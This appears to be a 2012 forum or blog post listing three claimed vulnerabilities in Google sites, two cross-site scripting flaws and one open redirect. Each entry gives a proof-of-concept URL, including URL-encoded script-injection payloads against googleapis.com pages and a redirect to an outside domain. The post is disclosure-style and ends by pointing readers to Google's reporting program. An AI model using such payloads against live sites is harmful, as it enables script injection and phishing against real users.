Hi all, here we've collected Google and Google's sites Vulnerabilities, which are found in 2012
Note : Xss will work in Mozilla Firefox only !
  1 : Cross site scripting  Vulnerability in Google.com
Domain : http://www.google.com
Title :  iGoogle
Vuln Type : Xss
Author : Yash and Code injector
Status : Unfixed
Link :  http://www.google.com/ig/directory?url=www.01fes.com/x.xml

2 : Open redirect Vulnerability in Google.com 
Domain : wap.google.com
Title : google for smartphones
Vuln Type : Open Redirect
Author : Minhal Mehdi
Status : Unfixed
Link :  http://wap.google.com/search?btnI&q=site:http://www.devilscafe.in/

3 : Xss Vulnerability in Google Apis 
Domain : googleapis.com
Title : Google API
Vuln Type : XSS
Author : d3v1l
Status : Unfixed
Link :  http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://chromium-browser-symbols.commondatastorage.googleapis.com/index.html?path=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

if you have any new Vulnerability then you can sumbit it to Google, read this post for more info